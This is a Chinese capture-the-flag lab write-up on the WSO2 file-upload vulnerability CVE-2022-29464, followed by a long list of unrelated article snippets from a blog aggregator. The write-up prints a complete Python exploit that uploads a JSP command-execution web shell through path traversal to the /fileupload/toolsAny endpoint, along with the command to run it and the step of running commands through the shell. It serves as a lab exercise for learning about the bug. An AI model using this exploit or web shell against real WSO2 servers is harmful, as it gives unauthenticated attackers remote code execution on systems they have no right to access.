仲瑿
仲瑿

【春秋云境】CVE-2022-29464

靶标介绍

WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。

靶场截图

【春秋云境】CVE-2022-29464_第1张图片 靶场复现

访问靶标url

题目也给我们提示了 WSO2文件上传漏洞(CVE-2022-29464),直接去GitHub搜一个exp直接运行就行

GitHub地址:GitHub - hakivvi/CVE-2022-29464: WSO2 RCE (CVE-2022-29464) exploit and writeup.

使用指令:

python3 exploit.py url shell.jsp

 然后访问如下图路径即可

然后在输入框里输入cat /flag 查看flag

【春秋云境】CVE-2022-29464_第2张图片 

exploit分析

import requests, urllib3, sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

if len(sys.argv) != 3:
    print(f"Usage: python3 {sys.argv[0]} https://host shell.jsp")
    exit()
    
host, file = sys.argv[1:]
shell = """

    
    


<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"
"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        
<%=output %>
"""

files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": shell}
response = requests.post(f'{host}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {host}/authenticationendpoint/{file}")

主要代码应该是下面这段代码

shell = """

    
    


<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"
"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        
<%=output %>
"""

通过这个shell上传了一个HTML表单来接收用户输入的命令,并在后端使用Java代码将该命令在系统中执行。

漏洞分析

这里大家直接去看大佬的文章我自己是分析不明白了:WSO2 API Manager 文件上传漏洞(CVE-2022-29464) 分析

你可能感兴趣的:(春秋云境Σ(っ,°Д,°;)っ,安全)

  • ThinkPHP运行目录设置为public子目录 NightReader 运维
    ThinkPHP是一个快速、兼容和简单的面向对象的PHP框架,它遵循MVC(模型-视图-控制器)设计模式。在ThinkPHP框架中,public目录扮演着非常重要的角色,它被设计为框架的公共访问目录。Public目录设置的原因和解决方案是ThinkPHP框架结构和安全策略的核心部分。原因:1)安全性:将public设为唯一的公共访问目录可以增强应用的安全性。通过限制对框架其他部分的访问,可以防止潜
  • Java 简介 谏君之 java教程java开发语言
    Java简介Java是一种基于类的面向对象的编程语言,旨在具有尽可能少的实现依赖关系。它旨在让应用程序开发人员**一次编写并随处运行(WORA),**这意味着编译后的Java代码可以在支持Java的所有平台上运行,而无需重新编译。Java广泛用于开发桌面、Web和移动设备的应用程序。Java以其简单性、健壮性和安全功能而闻名,使其成为企业级应用程序的热门选择。Java应用程序可以被编译为在任何Ja
  • 密码狗的使命 加密狗定制分析赋值 plotly人工智能scikit-learn密码学运维
    密码狗:数字时代的忠诚卫士在数字时代的浪潮中,"密码狗"这个充满科技感的词汇悄然兴起。它不是一个简单的密码管理工具,而是数字时代忠诚卫士的象征。密码狗守护着我们的数字资产,捍卫着我们的隐私安全,在虚拟与现实的边界上筑起一道坚固的防线。一、密码狗的使命在数字世界中,密码是守护个人隐私的第一道防线。密码狗的出现,让这道防线变得更加坚固。它采用先进的加密算法,将复杂的密码存储在安全的硬件设备中,确保即使
  • 告别繁琐、拥抱高效-翔云发票识别+发票查验接口 OCR_API 接口ocrpython开发语言c#pdf
    你是否还在为发票管理而烦恼?财务人员每天被堆积如山的发票淹没,手动录入信息耗时耗力,还容易出错?发票真伪难辨,担心收到假发票给企业带来损失?难以快速获取发票全票面信息,影响后续报销、入账等流程?缺乏有效的发票管理手段,难以进行数据分析和风险控制?别担心,翔云发票识别与发票查验接口来帮您!翔云发票识别与发票查验接口,为企业提供高效、精准的发票管理解决方案。只需上传发票图片或PDF文件,即可快速识别发
  • 如何看待焊接铸铁平台在工业范围中的应用(北重) 北重机械加工中心18833778062 制造
    铸铁焊接平台在工业范围的应用有很多优势和重要性,以下是一些观点:提高工作效率:铸铁焊接平台能提供稳固的工作平台,使工人在焊接过程中更加方便和高效。这有助于减少工作时间,并提高生产效率。提升焊接质量:铸铁焊接平台具有较高的稳定性和承载能力,能够确保焊接操作的精准性和安全性。这有助于提升焊接质量,并减少焊接缺陷的发生。保障工人安全:铸铁焊接平台能够提供稳固的工作支撑,避免工人在高处作业时发生意外。这有
  • 保护API测试数据:Postman中的敏感信息安全策略 2401_85812053 postmanlua测试工具
    标题:保护API测试数据:Postman中的敏感信息安全策略在当今数字化时代,API测试已成为软件开发过程中不可或缺的一环。然而,随着敏感数据的频繁交换,如何保护这些信息成为了一个重要议题。Postman,作为一款流行的API开发工具,提供了多种方法来确保测试数据的安全性。本文将深入探讨Postman中保护敏感信息的最佳实践,并提供实用的代码示例。1.理解敏感数据在讨论保护措施之前,首先需要明确什
  • Postman中的API安全堡垒:全面安全性测试指南_postman安全测试 程序员鱼 postman安全安全性测试dockersslweb安全学习
    ️Postman中的API安全堡垒:全面安全性测试指南在当今的数字化世界中,API安全性是保护数据和系统不可或缺的一环。Postman作为API开发和测试的领先工具,提供了多种功能来帮助开发者进行API安全性测试。本文将深入探讨如何在Postman中进行API安全性测试,通过详细的步骤、丰富的代码示例,教您如何识别和预防潜在的安全威胁。API安全性测试概述API安全性测试旨在评估API的安全性,确
  • 将excel文件各列保存为txt的实战代码 爱编程的喵喵 Python基础课程pythonexceltxt实战代码
      大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为CSDN博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学的知识进行总结与归纳,不仅形成深入且独到的理解,而且能够帮助新手快速入门。  本文主要介绍了将excel文件各列保存为txt的实
  • 强化学习与网络安全资源-论文和环境 AI拉呱 web安全安全
    TableofContentsRL-EnvironmentsPapersBooksBlogpostsTalksMiscellaneous↑EnvironmentsPentestingTrainingFrameworkforReinforcementLearningAgents(PenGym)TheARCDPrimary-levelAITrainingEnvironment(PrimAITE)CSL
  • 【C++ 】动态内存管理:new/delete与malloc/free的对比 SuhyOvO C++C语言c++
    在C++中,动态内存管理是一个至关重要的概念。它允许我们在程序运行时根据需要动态地分配和释放内存,为对象创建和销毁提供了灵活性。在C++中,我们通常会用到两对工具:new/delete和malloc/free。虽然它们都能够完成类似的任务,但在使用、安全性和灵活性方面存在显著差异。new/delete类型安全性:new和delete提供了更好的类型安全性。在使用new创建对象时,会自动调用构造函数
  • 私有化部署下的团队协作:如何平衡安全与效率? 项目管理软件
    企业团队协作工具的私有化部署是指将软件部署在企业自有的服务器上,而非使用公有云或第三方平台。以下是对企业团队协作工具私有化的详细分析:一、私有化的优势●数据安全可控:企业数据存储在本地服务器,无需上传至第三方平台,有效降低数据泄露风险,满足企业对数据安全的高要求。●系统稳定可靠:私有化部署可根据企业自身需求进行定制化配置,保障系统稳定运行,避免因网络波动或平台故障导致的业务中断。●灵活扩展性强:企
  • 等保密评如何申请SSL证书 网络安全
    1.什么是等保密评与SSL证书等保密评:依据国家等级保护标准,对信息系统进行安全评估,确保其达到相应安全等级。SSL证书:用于加密网站与用户之间的通信,确保数据传输安全,防止信息泄露。在等保密评中,SSL证书是保障数据传输安全的重要工具,尤其适用于涉及敏感信息的系统。2.为什么需要SSL证书?数据加密:防止数据在传输过程中被窃取或篡改。身份验证:确保用户访问的是合法网站,防止钓鱼攻击。合规要求:等
  • 局域网/内网IP证书申请指南 网络安全
    一、什么是局域网/内网IP证书?局域网/内网IP证书是一种SSL/TLS证书,用于验证局域网或内网中IP地址的身份,并加密设备之间的通信。它适用于内部网络环境,无需公网域名即可使用。二、局域网/内网IP证书的应用场景内部系统安全通信:例如,企业内部的OA系统、ERP系统等,使用IP证书加密通信,保障数据安全。物联网设备身份验证:局域网内的物联网设备使用IP证书验证身份,防止设备被仿冒。其他需要使用
  • SSL 证书的分类 ssl证书ssl
    一、按验证级别分类(一)DVSSL证书(域名验证型证书)这是最基础的证书类型,主要功能是加密传输数据。其验证流程简单,仅确认申请者对域名的所有权,通常几分钟就能完成验证。由于验证程度有限,无法充分证明网站的真实身份。适用于个人博客、小型企业网站或非交易类网站,这类网站只需实现数据加密传输以及在浏览器地址栏显示小绿锁标志,以表明网站具备基本安全性。(二)OVSSL证书(组织验证型证书)不仅能加密传输
  • 邮件安全证书的重要性 前端
    1.什么是邮件安全证书?邮件安全证书是一种数字证书,用于加密电子邮件内容并验证发件人身份,确保邮件在传输过程中的安全性和真实性。它通过加密技术和数字签名保护邮件内容,防止信息被窃取或篡改。2.邮件安全证书的作用2.1邮件加密邮件安全证书通过加密技术保护邮件内容,防止敏感信息在传输过程中被第三方窃取。2.2身份验证邮件安全证书可以验证发件人的身份,确保邮件来自可信的来源,防止钓鱼邮件和伪造邮件。2.
  • 基于微服务架构的毕业设计:2025年计算机毕业设计选题汇总(建议收藏)✅ 会写代码的羊 毕设选题架构微服务课程设计毕设系统毕设选题微服务架构java微服务
    文章目录前言最新毕设选题(建议收藏起来)基于微服务架构的毕业设计选题毕设作品推荐前言2025全新毕业设计项目博主介绍:✌全网粉丝10W+,CSDN全栈领域优质创作者,博客之星、掘金/华为云/阿里云等平台优质作者。精彩专栏推荐订阅计算机毕业设计精品项目案例-500套基于JavaSpringBoot的微信校园二手交易小程序平台开发系列(一)基于校园二手物品交易小程序系统设计与实现系列(二)基于云开发微
  • 智能守护者X100 - 自动化生产线智能机器人安全监控管理系统 大霸王龙 行业+领域+业务场景=定制pythonmicrosoftascii文本处理
    1.产品介绍产品名称:智能守护者X100-自动化生产线智能机器人安全监控管理系统主要功能:全方位实时监控:智能守护者X100采用高清摄像头与红外夜视技术,实现对自动化生产线及智能机器人的360°无死角监控。系统能自动识别并追踪生产线上的机器人活动轨迹,确保生产安全无遗漏。智能异常检测与预警:集成先进的人工智能算法,能够实时分析视频数据,自动识别机器人操作异常(如碰撞、卡顿、偏离预定路径等),并立即
  • 筑牢数据安全防线,SSL 证书为企业数字化护航 ssl证书ssl
    在2025年,随着《数据安全法》修订版正式落地实施,企业数据加密与身份验证已然成为合规经营的刚性需求。权威数据表明,未部署HTTPS的网站因安全警告,用户流失率高达32%;而采用企业级SSL证书的电商平台,交易转化率提升超20%。在此严峻形势下,JoySSL凭借极具性价比的付费证书服务,脱颖而出,成为中小企业实现安全升级的优质选择。付费SSL证书,企业安全的坚实护盾免费证书虽能实现基础加密,但仅仅
  • 从代码到云端:纷析云以开源生态重构企业财务管理边界 沈晓晶 开源javagiteegitcode
    一、公司简介纷析云是专注于企业数字化转型的财务软件服务商,致力于提供高效、安全且灵活的财务管理工具。通过结合云计算、开源技术与智能化功能,纷析云助力企业实现财务流程的自动化与合规化,尤其适合中小型企业及需要高度定制化的用户。二、核心产品与解决方案灵活的部署模式:源代码销售:企业可购买源代码进行二次开发,完全掌控系统功能,满足个性化需求。私有化部署:适用于对数据隐私要求高的企业,支持本地化部署与定制
  • 博通Emulex Secure HBA:后量子加密与零信任架构的存储网络革命 古猫先生 产业动态架构网络量子计算
    在数字化浪潮中,数据安全愈发关键。近期,博通推出的EmulexSecureHBAs配备后量子加密技术,引发了行业的广泛关注。这一创新产品不仅是技术的突破,更是应对未来数据安全挑战的重要举措。量子计算机的并行计算能力理论上可破解当前广泛使用的RSA、ECC等非对称加密算法,尤其是针对公钥基础设施(PKI)的攻击可能彻底颠覆现有网络安全体系。尽管实用化量子计算机尚未成熟,但其威胁已引发全球安全界的警惕
  • 【构建企业级Spring Boot应用:从基础到高级的全面指南】 小怪兽9699 springboot后端java
    摘要本文旨在为开发者提供一份详尽的指南,帮助大家深入理解并掌握如何使用SpringBoot框架来快速开发企业级应用程序。通过实际案例分析、代码示例以及架构设计思路分享,读者不仅能够学习到理论知识,还能获得宝贵的实践经验。本文将涵盖从环境搭建、项目创建、配置管理、数据访问层、Web服务开发、安全机制实现、日志记录、单元测试与集成测试,到最终的部署上线等各个方面。目录摘要目录引言SpringBoot简
  • 使用 Nginx 轻松处理跨域请求(CORS) m0_74824025 面试学习路线阿里巴巴nginx运维
    使用Nginx轻松处理跨域请求(CORS)在现代Web开发中,跨域资源共享(CORS)是一种重要的机制,用于解决浏览器的同源策略限制。CORS允许服务器声明哪些来源可以访问其资源,从而确保安全性与可用性。本文将介绍如何在Nginx中配置跨域访问,并详细解析每个配置项的作用和用法。什么是CORS?CORS(Cross-OriginResourceSharing)是一种HTTP头部机制,允许服务器声明
  • Nodemailer使用教程:在Node.js中发送电子邮件 m0_74824054 面试学习路线阿里巴巴node.jslinux运维
    目录1.简介2.安装3.基本配置3.1创建传输器3.2配置说明4.发送邮件4.1基本发送示例4.2发送验证码示例5.?常见问题解决5.1“Greetingneverreceived”?错误5.2?安全建议SMTP与邮件加密协议详解?1.SMTP简介1.1基本特点2.加密协议对比2.1SSL/TLS(端口465)?2.2?STARTTLS(端口587)3.端口使用建议3.1常用端口对比3.2选择建议
  • Teams电话 中国语音解决方案 CTS喜友科技 信息与通信网络
    Teams电话中国语音解决方案,目前有以下四种方式:一、PhoneSystemwithCallingPlan(基于云服务,目前中国没有)直接使用Microsoft名下的电话号码,把Microsoft当作运营商,直接购买通话套餐即可,这是Microsoft提供的一整套全云解决方案集成了外线+IPPBX+Teams,也是最简单的Teams语音解决方案,适用于300人或者更少的中小型企业。据官方咨询,目
  • Linux服务器防火墙白名单访问策略的配置示例 一望无际的大草原 后端运维防火墙服务器linux防火墙
    最近在做Linux系统应用部署配置过程中,为了确保应用的安全,简单学习了解了一些Linux中的动态防火墙管理工具的使用方法。本文测试实验主要采用Linux服务器的动态防火墙管理工具(即firewalld),来实现服务或端口的访问控制,firewalld主要用于管理Linux系统中的防火墙规则,firewalld不是一个独立的防火墙软件,他基于Linux内核的netfilter框架的前端工具,fir
  • 护栏碰撞监测报警装置应用案例及效果分析 德克西尔DrKsir 传感器人工智能
    引言在现代交通系统中,护栏作为道路安全的重要屏障,承担着保护行人、车辆和道路设施的关键作用。然而,传统护栏在面对车辆失控撞击时,往往只能被动承受冲击,无法主动预警或采取应对措施。护栏碰撞监测报警装置的出现,为交通安全带来了革命性的变化。这种装置通过实时监测护栏状态,及时发现碰撞事件并发出警报,为后续应急处置争取宝贵时间。本文将通过实际应用案例,深入分析护栏碰撞监测报警装置的效果,帮助读者全面了解其
  • 在多线程里购买订单业务应该考虑什么问题,应该怎么做这个业务 Su米苏 经验分享
    在多线程环境下处理订单购买业务时,需要考虑以下几个关键问题,并采取相应的措施来确保业务的正确性和性能:1.线程安全问题:多个线程可能同时访问和修改共享资源(如库存、订单状态等),导致数据不一致或竞态条件。解决方案:使用锁机制(如synchronized、ReentrantLock)来保护共享资源。使用线程安全的数据结构(如ConcurrentHashMap、AtomicInteger)。尽量减少锁
  • JavaEE初阶-多线程3 炙热的大叔 JavaEE初阶java-eejava学习
    文章目录一、线程安全问题-内存可见性二、等待通知2.1wait()方法2.2notify()方法一、线程安全问题-内存可见性importjava.util.Scanner;publicclassDemo27{privatestaticintcount=0;//下面这段代码会出现内存的可见性问题//将从内存中读取count值的操作称为load判断操作称为cmp//load和cmp的执行速度差了好几个
  • traceroute或tracepath区别 l23456789o linuxlinux
    traceroute和tracepath都是网络诊断工具,用于追踪数据包在网络中的路径,以帮助用户发现网络中可能存在的问题。以下是两者的具体区别:一、实现方式traceroute:通过调用原始数据包实现。由于直接处理原始数据包,某些选项可能需要超级用户(sudo)权限。tracepath:通过API实现。API嵌套了很多安全机制,因此使用tracepath时通常不需要root权限。二、协议与选项t
  • “Encrypt”属性设置为“true”且 “trustServerCertificate”属性设置为“false”,但驱动程序无法使用安全套接字层 (SSL) 加密与 SQL Server 建立安全 已是上好佳 ssl安全网络协议
    com.microsoft.sqlserver.jdbc.SQLServerException:“Encrypt”属性设置为“true”且“trustServerCertificate”属性设置为“false”,但驱动程序无法使用安全套接字层(SSL)加密与SQLServer建立安全连接:错误:PKIXpathbuildingfailed:sun.security.provider.certpat
  • java短路运算符和逻辑运算符的区别 3213213333332132 java基础
    /* * 逻辑运算符——不论是什么条件都要执行左右两边代码 * 短路运算符——我认为在底层就是利用物理电路的“并联”和“串联”实现的 * 原理很简单,并联电路代表短路或(||),串联电路代表短路与(&&)。 * * 并联电路两个开关只要有一个开关闭合,电路就会通。 * 类似于短路或(||),只要有其中一个为true(开关闭合)是
  • Java异常那些不得不说的事 白糖_ javaexception
    一、在finally块中做数据回收操作 比如数据库连接都是很宝贵的,所以最好在finally中关闭连接。 JDBCAgent jdbc = new JDBCAgent(); try{ jdbc.excute("select * from ctp_log"); }catch(SQLException e){ ... }finally{ jdbc.close();
  • utf-8与utf-8(无BOM)的区别 dcj3sjt126com PHP
    BOM——Byte Order Mark,就是字节序标记   在UCS 编码中有一个叫做"ZERO WIDTH NO-BREAK SPACE"的字符,它的编码是FEFF。而FFFE在UCS中是不存在的字符,所以不应该出现在实际传输中。UCS规范建议我们在传输字节流前,先传输 字符"ZERO WIDTH NO-BREAK SPACE"。这样如
  • JAVA Annotation之定义篇 周凡杨 java注解annotation入门注释
        Annotation: 译为注释或注解 An annotation, in the Java computer programming language, is a form of syntactic metadata that can be added to Java source code. Classes, methods, variables, pa
  • tomcat的多域名、虚拟主机配置 g21121 tomcat
    众所周知apache可以配置多域名和虚拟主机,而且配置起来比较简单,但是项目用到的是tomcat,配来配去总是不成功。查了些资料才总算可以,下面就跟大家分享下经验。 很多朋友搜索的内容基本是告诉我们这么配置: 在Engine标签下增面积Host标签,如下: <Host name="www.site1.com" appBase="webapps"
  • Linux SSH 错误解析(Capistrano 的cap 访问错误 Permission ) 510888780 linuxcapistrano
    1.ssh -v hdfs@192.168.18.133 出现 Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password). 错误 运行状况如下: OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013 debug1: Reading configuratio
  • log4j的用法 Harry642 javalog4j
    一、前言:     log4j 是一个开放源码项目,是广泛使用的以Java编写的日志记录包。由于log4j出色的表现,     当时在log4j完成时,log4j开发组织曾建议sun在jdk1.4中用log4j取代jdk1.4 的日志工具类,但当时jdk1.4已接近完成,所以sun拒绝使用log4j,当在java开发中
  • mysql、sqlserver、oracle分页,java分页统一接口实现 aijuans oraclejave
    定义:pageStart 起始页,pageEnd 终止页,pageSize页面容量 oracle分页:     select * from ( select mytable.*,rownum num from (实际传的SQL) where rownum<=pageEnd) where num>=pageStart sqlServer分页:  
  • Hessian 简单例子 antlove javaWebservicehessian
    hello.hessian.MyCar.java package hessian.pojo; import java.io.Serializable; public class MyCar implements Serializable { private static final long serialVersionUID = 473690540190845543
  • 数据库对象的同义词和序列 百合不是茶 sql序列同义词ORACLE权限
    回顾简单的数据库权限等命令; 解锁用户和锁定用户 alter user scott account lock/unlock; //system下查看系统中的用户 select * dba_users; //创建用户名和密码 create user wj identified by wj; identified by //授予连接权和建表权 grant connect to
  • 使用Powermock和mockito测试静态方法 bijian1013 持续集成单元测试mockitoPowermock
            实例: package com.bijian.study; import static org.junit.Assert.assertEquals; import java.io.IOException; import org.junit.Before; import org.junit.Test; import or
  • 精通Oracle10编程SQL(6)访问ORACLE bijian1013 oracle数据库plsql
    /* *访问ORACLE */ --检索单行数据 --使用标量变量接收数据 DECLARE v_ename emp.ename%TYPE; v_sal emp.sal%TYPE; BEGIN select ename,sal into v_ename,v_sal from emp where empno=&no; dbms_output.pu
  • 【Nginx四】Nginx作为HTTP负载均衡服务器 bit1129 nginx
     Nginx的另一个常用的功能是作为负载均衡服务器。一个典型的web应用系统,通过负载均衡服务器,可以使得应用有多台后端服务器来响应客户端的请求。一个应用配置多台后端服务器,可以带来很多好处:   负载均衡的好处 增加可用资源 增加吞吐量 加快响应速度,降低延时 出错的重试验机制 Nginx主要支持三种均衡算法: round-robin l
  • jquery-validation备忘 白糖_ jquerycssF#Firebug
    留点学习jquery validation总结的代码:   function checkForm(){ validator = $("#commentForm").validate({// #formId为需要进行验证的表单ID errorElement :"span",// 使用"div"标签标记错误, 默认:&
  • solr限制admin界面访问(端口限制和http授权限制) ronin47 限定Ip访问
    solr的管理界面可以帮助我们做很多事情,但是把solr程序放到公网之后就要限制对admin的访问了。 可以通过tomcat的http基本授权来做限制,也可以通过iptables防火墙来限制。 我们先看如何通过tomcat配置http授权限制。 第一步: 在tomcat的conf/tomcat-users.xml文件中添加管理用户,比如: <userusername="ad
  • 多线程-用JAVA写一个多线程程序,写四个线程,其中二个对一个变量加1,另外二个对一个变量减1 bylijinnan java多线程
    public class IncDecThread { private int j=10; /* * 题目:用JAVA写一个多线程程序,写四个线程,其中二个对一个变量加1,另外二个对一个变量减1 * 两个问题: * 1、线程同步--synchronized * 2、线程之间如何共享同一个j变量--内部类 */ public static
  • 买房历程 cfyme
        2015-06-21: 万科未来城,看房子   2015-06-26: 办理贷款手续,贷款73万,贷款利率5.65=5.3675   2015-06-27: 房子首付,签完合同   2015-06-28,央行宣布降息 0.25,就2天的时间差啊,没赶上。   首付,老婆找他的小姐妹接了5万,另外几个朋友借了1-
  • [军事与科技]制造大型太空战舰的前奏 comsci 制造
           天气热了........空调和电扇要准备好..........        最近,世界形势日趋复杂化,战争的阴影开始覆盖全世界..........        所以,我们不得不关
  • dateformat dai_lm DateFormat
    "Symbol Meaning Presentation Ex." "------ ------- ------------ ----" "G era designator (Text) AD" "y year
  • Hadoop如何实现关联计算 datamachine mapreducehadoop关联计算
        选择Hadoop,低成本和高扩展性是主要原因,但但它的开发效率实在无法让人满意。     以关联计算为例。     假设:HDFS上有2个文件,分别是客户信息和订单信息,customerID是它们之间的关联字段。如何进行关联计算,以便将客户名称添加到订单列表中?   &nbs
  • 用户模型中修改用户信息时,密码是如何处理的 dcj3sjt126com yii
    当我添加或修改用户记录的时候对于处理确认密码我遇到了一些麻烦,所有我想分享一下我是怎么处理的。 场景是使用的基本的那些(系统自带),你需要有一个数据表(user)并且表中有一个密码字段(password),它使用 sha1、md5或其他加密方式加密用户密码。 面是它的工作流程: 当创建用户的时候密码需要加密并且保存,但当修改用户记录时如果使用同样的场景我们最终就会把用户加密过的密码再次加密,这
  • 中文 iOS/Mac 开发博客列表 dcj3sjt126com Blog
      本博客列表会不断更新维护,如果有推荐的博客,请到此处提交博客信息。 本博客列表涉及的文章内容支持 定制化Google搜索,特别感谢 JeOam 提供并帮助更新。 本博客列表也提供同步更新的OPML文件(下载OPML文件),可供导入到例如feedly等第三方定阅工具中,特别感谢 lcepy 提供自动转换脚本。这里有导入教程。
  • js去除空格,去除左右两端的空格 蕃薯耀 去除左右两端的空格js去掉所有空格js去除空格
    js去除空格,去除左右两端的空格 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>&g
  • SpringMVC4零配置--web.xml hanqunfeng springmvc4
    servlet3.0+规范后,允许servlet,filter,listener不必声明在web.xml中,而是以硬编码的方式存在,实现容器的零配置。 ServletContainerInitializer:启动容器时负责加载相关配置 package javax.servlet; import java.util.Set; public interface ServletContainer
  • 《开源框架那些事儿21》:巧借力与借巧力 j2eetop 框架UI
    同样做前端UI,为什么有人花了一点力气,就可以做好?而有的人费尽全力,仍然错误百出?我们可以先看看几个故事。 故事1:巧借力,乌鸦也可以吃核桃 有一个盛产核桃的村子,每年秋末冬初,成群的乌鸦总会来到这里,到果园里捡拾那些被果农们遗落的核桃。 核桃仁虽然美味,但是外壳那么坚硬,乌鸦怎么才能吃到呢?原来乌鸦先把核桃叼起,然后飞到高高的树枝上,再将核桃摔下去,核桃落到坚硬的地面上,被撞破了,于是,
  • JQuery EasyUI 验证扩展 可怜的猫 jqueryeasyui验证
      最近项目中用到了前端框架-- EasyUI,在做校验的时候会涉及到很多需要自定义的内容,现把常用的验证方式总结出来,留待后用。   以下内容只需要在公用js中添加即可。   使用类似于如下: <input class="easyui-textbox" name="mobile" id="mobile&
  • 架构师之httpurlconnection----------读取和发送(流读取效率通用类) nannan408
    1.前言.    如题. 2.代码. /* * Copyright (c) 2015, S.F. Express Inc. All rights reserved. */ package com.test.test.test.send; import java.io.IOException; import java.io.InputStream
  • Jquery性能优化 r361251 JavaScriptjquery
    一、注意定义jQuery变量的时候添加var关键字 这个不仅仅是jQuery,所有javascript开发过程中,都需要注意,请一定不要定义成如下: $loading = $('#loading'); //这个是全局定义,不知道哪里位置倒霉引用了相同的变量名,就会郁闷至死的 二、请使用一个var来定义变量 如果你使用多个变量的话,请如下方式定义: . 代码如下: var page
  • 在eclipse项目中使用maven管理依赖 tjj006 eclipsemaven
    概览: 如何导入maven项目至eclipse中 建立自有Maven  Java类库服务器 建立符合maven代码库标准的自定义类库 Maven在管理Java类库方面有巨大的优势,像白衣所说就是非常“环保”。 我们平时用IDE开发都是把所需要的类库一股脑的全丢到项目目录下,然后全部添加到ide的构建路径中,如果用了SVN/CVS,这样会很容易就 把
  • 中国天气网省市级联页面 x125858805 级联
    1、页面及级联js <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> &l
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他